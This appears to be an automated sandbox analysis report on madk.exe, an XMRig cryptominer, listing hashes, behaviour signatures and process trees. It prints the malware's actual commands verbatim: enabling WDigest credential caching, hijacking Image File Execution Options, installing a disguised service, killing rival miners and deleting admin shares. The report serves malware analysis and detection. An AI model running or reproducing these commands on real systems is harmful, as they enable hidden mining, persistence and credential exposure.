xmrig | 025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594

Resubmissions

26-09-2022 23:59

220926-318jzsdcgn 10

21-06-2022 21:54

220621-1skf3sgcg9 10

Analysis

max time kernel
150s
max time network
103s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
26-09-2022 23:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

madk.exe
Size

3.4MB
MD5

d00af5991807952929e5b986afd295c9
SHA1

7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
SHA256

025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
SHA512

c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
SSDEEP

98304:jKqtESnFRAW/YS7gCPJDEYFu6GyPuzBPrQ:FnFRV/Bt1E8u6yNQ

Score

10^/10

xmrig discovery evasion miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2512-1465-0x0000000000400000-0x0000000000DEF000-memory.dmp	xmrig

Executes dropped EXE 64 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeattrib.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeattrib.execmd.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeConhost.exesvchost.exeConhost.exeattrib.exesvchost.exesvchost.exesvchost.exeattrib.exesvchost.exesvchost.exeConhost.exesvchost.exesvchost.exesvchost.exesvchost.exeConhost.exeConhost.exesvchost.exeConhost.exesvchost.exeConhost.exesvchost.execmd.exeConhost.exesvchost.exesvchost.exesvchost.exeConhost.exesvchost.exesvchost.exesvchost.exesvchost.exeConhost.exeattrib.execmd.exe

pid	process
1168	svchost.exe
96	svchost.exe
1592	svchost.exe
2476	svchost.exe
4588	svchost.exe
3100	svchost.exe
2512	conhost.exe
4016	svchost.exe
2332	svchost.exe
4704	svchost.exe
192	svchost.exe
1380	svchost.exe
504	attrib.exe
656	svchost.exe
1344	svchost.exe
3288	svchost.exe
4520	svchost.exe
2536	svchost.exe
208	svchost.exe
2644	attrib.exe
1908	cmd.exe
2400
4908	svchost.exe
3628	svchost.exe
2160	svchost.exe
3492	svchost.exe
2456	svchost.exe
3780	svchost.exe
4904	svchost.exe
2764	Conhost.exe
1040	svchost.exe
3688	Conhost.exe
3856	attrib.exe
1492	svchost.exe
496	svchost.exe
3996	svchost.exe
2980	attrib.exe
4976	svchost.exe
644	svchost.exe
4852	Conhost.exe
772	svchost.exe
5072	svchost.exe
2280	svchost.exe
3076	svchost.exe
1968	Conhost.exe
864	Conhost.exe
4324	svchost.exe
4888	Conhost.exe
2252	svchost.exe
4228	Conhost.exe
1664	svchost.exe
3852	cmd.exe
5476	Conhost.exe
5484	svchost.exe
5492	svchost.exe
5500	svchost.exe
6004	Conhost.exe
6012	svchost.exe
6020	svchost.exe
6028	svchost.exe
5364	svchost.exe
5380	Conhost.exe
4964	attrib.exe
4236	cmd.exe

Sets file execution options in registry 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe\deebugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe\deebugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe	reg.exe

Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2252 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2252	attrib.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2960-126-0x0000000000400000-0x0000000000809000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/1168-346-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\??\c:\windows\Fonts\svchost.exe	upx
behavioral1/memory/1168-432-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/96-454-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1592-464-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/4588-484-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2960-496-0x0000000000400000-0x0000000000809000-memory.dmp	upx
behavioral1/memory/3100-503-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/2476-639-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2960-679-0x0000000000400000-0x0000000000809000-memory.dmp	upx
C:\Windows\Fonts\conhost.exe	upx
\??\c:\windows\Fonts\conhost.exe	upx
behavioral1/memory/2512-816-0x0000000000400000-0x0000000000DEF000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/4016-893-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/4704-897-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2332-898-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/192-941-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/1380-931-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/3100-922-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/504-994-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/656-1007-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/4520-1033-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2644-1037-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/3288-1025-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1344-1016-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/208-1062-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/2536-1047-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/2400-1073-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/3628-1097-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/192-1099-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1908-1098-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/4908-1082-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx

Deletes itself 1 IoCs

Processes:

WScript.exe

pid process

2244 WScript.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exe

pid process

1452 takeown.exe

pid	process
2244	WScript.exe

pid	process
1452	takeown.exe

Drops file in Windows directory 64 IoCs

Processes:

attrib.exeConhost.exeConhost.exemadk.exeattrib.exeattrib.exesvchost.exesvchost.exesvchost.exeConhost.execonhost.execmd.exeattrib.exeConhost.exeConhost.exesvchost.exeattrib.exeattrib.exesvchost.exeattrib.exeattrib.exeConhost.exeattrib.exeattrib.exesvchost.execmd.exeConhost.exeattrib.exeConhost.exesvchost.exeattrib.exesvchost.exeattrib.exeConhost.exeattrib.exeConhost.execmd.exeattrib.exeattrib.exeattrib.exeConhost.exeattrib.execmd.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeConhost.exesvchost.exesvchost.exeConhost.exeattrib.execmd.exesvchost.exesvchost.exeConhost.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File created	\??\c:\windows\Fonts\svchost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File created	\??\c:\windows\Fonts\WinRing0x64.sys	madk.exe
File opened for modification	\??\c:\windows\Fonts\conhost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	\??\c:\windows\Fonts\rundlls.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	cmd.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	cmd.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	cmd.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	cmd.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File created	\??\c:\windows\Fonts\conhost.exe	madk.exe
File opened for modification	\??\c:\windows\Fonts\svchost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	cmd.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	svchost.exe
File opened for modification	C:\Windows\Fonts	Conhost.exe
File opened for modification	C:\Windows\Fonts	cmd.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1404	sc.exe
2256	sc.exe
4820	sc.exe
4684	sc.exe
6084	sc.exe
5020	sc.exe
3416	sc.exe
4332	sc.exe
4472	sc.exe
5544	sc.exe
4956	sc.exe
4612	sc.exe
3628	sc.exe
4692	sc.exe
4920	sc.exe
6996	sc.exe
4380	sc.exe
3988	sc.exe
4520	sc.exe
4444	sc.exe
7044	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with WMI 2 IoCs
evasion

Processes:

WMIC.exeWMIC.exe

pid process

4848 WMIC.exe
7124 WMIC.exe

pid	process
4848	WMIC.exe
7124	WMIC.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4356	taskkill.exe
4052	taskkill.exe
5092	taskkill.exe
4840	taskkill.exe
4580	taskkill.exe
4004	taskkill.exe
4264	taskkill.exe
4676	taskkill.exe
1340	taskkill.exe

Modifies registry class 1 IoCs

Processes:

madk.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings madk.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2184 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4624 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	madk.exe

pid	process
2184	reg.exe

pid	process
4624	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.exe

pid	process
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe
2512	conhost.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	4264	taskkill.exe
Token: SeDebugPrivilege	4356	taskkill.exe
Token: SeDebugPrivilege	4052	taskkill.exe
Token: SeDebugPrivilege	4840
Token: SeDebugPrivilege	4580	taskkill.exe
Token: SeDebugPrivilege	5092	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

madk.execonhost.exe

pid process

2960 madk.exe
2960 madk.exe
2512 conhost.exe
2512 conhost.exe

pid	process
2960	madk.exe
2960	madk.exe
2512	conhost.exe
2512	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

madk.exe

description	pid	process	target process
PID 2960 wrote to memory of 2356	2960	madk.exe	cmd.exe
PID 2960 wrote to memory of 2356	2960	madk.exe	cmd.exe
PID 2960 wrote to memory of 2356	2960	madk.exe	cmd.exe
PID 2960 wrote to memory of 2184	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 2184	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 2184	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4904	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4904	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4904	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4960	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4960	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4960	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4992	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4992	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4992	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4376	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4376	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 4376	2960	madk.exe	reg.exe
PID 2960 wrote to memory of 3628	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 3628	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 3628	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4520	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4520	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4520	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 2256	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 2256	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 2256	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4332	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4332	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4332	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 1404	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 1404	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 1404	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 5020	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 5020	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 5020	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 3416	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 3416	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 3416	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 3988	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 3988	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 3988	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4004	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4004	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4004	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4356	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4356	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4356	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4264	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4264	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4264	2960	madk.exe	taskkill.exe
PID 2960 wrote to memory of 4496	2960	madk.exe	net.exe
PID 2960 wrote to memory of 4496	2960	madk.exe	net.exe
PID 2960 wrote to memory of 4496	2960	madk.exe	net.exe
PID 2960 wrote to memory of 4248	2960	madk.exe	net1.exe
PID 2960 wrote to memory of 4248	2960	madk.exe	net1.exe
PID 2960 wrote to memory of 4248	2960	madk.exe	net1.exe
PID 2960 wrote to memory of 4084	2960	madk.exe	net.exe
PID 2960 wrote to memory of 4084	2960	madk.exe	net.exe
PID 2960 wrote to memory of 4084	2960	madk.exe	net.exe
PID 2960 wrote to memory of 4692	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4692	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4692	2960	madk.exe	sc.exe
PID 2960 wrote to memory of 4672	2960	madk.exe	net.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
6972	attrib.exe
3932	attrib.exe
6516
1860
3452	attrib.exe
3856	attrib.exe
3628	attrib.exe
5900	attrib.exe
1488	attrib.exe
6028
5772
516	attrib.exe
5284	attrib.exe
2256	attrib.exe
2156	attrib.exe
6064	attrib.exe
5264	attrib.exe
5372	attrib.exe
3744	attrib.exe
5388
6236	attrib.exe
6208	attrib.exe
5160	attrib.exe
6948	attrib.exe
4988
3144
5156	attrib.exe
5568	attrib.exe
3960	attrib.exe
6240	attrib.exe
7120	attrib.exe
6332	attrib.exe
3396
7032
6264	attrib.exe
2696	attrib.exe
6072	attrib.exe
6832	attrib.exe
6180	attrib.exe
2540
3460	attrib.exe
2980	attrib.exe
6596	attrib.exe
4696	attrib.exe
5928
188	attrib.exe
5288	attrib.exe
5356	attrib.exe
6972	attrib.exe
3928	attrib.exe
5712	attrib.exe
2384
4308	attrib.exe
5956	attrib.exe
3240	attrib.exe
5496	attrib.exe
6420	attrib.exe
1792
5928	attrib.exe
5500	attrib.exe
4680	attrib.exe
3488	attrib.exe
2588	attrib.exe
1268	attrib.exe

C:\Users\Admin\AppData\Local\Temp\madk.exe
"C:\Users\Admin\AppData\Local\Temp\madk.exe"
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2960

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
2⤵
PID:2356

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
3⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:188

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2⤵
- Modifies registry key
PID:2184

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
2⤵
PID:4992

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
2⤵
PID:4376

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5360

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMaims
2⤵
- Launches sc.exe
PID:1404

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMaims
2⤵
- Launches sc.exe
PID:5020

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMais
2⤵
- Launches sc.exe
PID:3416

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMais
2⤵
- Launches sc.exe
PID:3988

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im dl1hots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4004

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im d1lhots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4356

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im rundlls.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Windows\SysWOW64\sc.exe
sc delete SetPipAtcivator
2⤵
- Launches sc.exe
PID:4332

C:\Windows\SysWOW64\sc.exe
sc stop SetPipAtcivator
2⤵
- Launches sc.exe
PID:2256

C:\Windows\SysWOW64\sc.exe
sc delete MetPipAtcivator
2⤵
- Launches sc.exe
PID:4520

C:\Windows\SysWOW64\sc.exe
sc stop MetPipAtcivator
2⤵
- Launches sc.exe
PID:3628

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
- Sets file execution options in registry
PID:4960

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
- Sets file execution options in registry
PID:4904

C:\Windows\SysWOW64\net.exe
net user mm123$ /del
2⤵
PID:4496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user mm123$ /del
3⤵
PID:3464

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
2⤵
- Launches sc.exe
PID:4692

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
2⤵
PID:4084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
3⤵
PID:2132

C:\Windows\SysWOW64\net1.exe
net1 user mm123$ /del
2⤵
PID:4248

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
2⤵
- Executes dropped EXE
PID:1168

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
2⤵
- Executes dropped EXE
PID:96

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
2⤵
- Executes dropped EXE
PID:1592

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
2⤵
- Launches sc.exe
PID:4820

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
2⤵
PID:4672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
3⤵
PID:3492

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:2476

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\TEMP\csonhost.bat
2⤵
PID:3824

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
3⤵
PID:2932

C:\Windows\SysWOW64\PING.EXE
ping 127.1 -n 5
3⤵
- Runs ping.exe
PID:4624

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
- Launches sc.exe
PID:4920

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
- Launches sc.exe
PID:4684

C:\Windows\SysWOW64\net.exe
net share iPC$ /delete
3⤵
PID:4692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share iPC$ /delete
4⤵
PID:6056

C:\Windows\SysWOW64\net.exe
net share admin$ /delete
3⤵
PID:2884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share admin$ /delete
4⤵
PID:5352

C:\Windows\SysWOW64\net.exe
net share c$ /delete
3⤵
PID:5576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share c$ /delete
4⤵
PID:6340

C:\Windows\SysWOW64\net.exe
net share d$ /delete
3⤵
PID:6360

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share d$ /delete
4⤵
PID:6740

C:\Windows\SysWOW64\net.exe
net share e$ /delete
3⤵
PID:1592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share e$ /delete
4⤵
PID:6540

C:\Windows\SysWOW64\net.exe
net share f$ /delete
3⤵
PID:1676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share f$ /delete
4⤵
PID:944

C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
3⤵
PID:6648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
4⤵
PID:2304

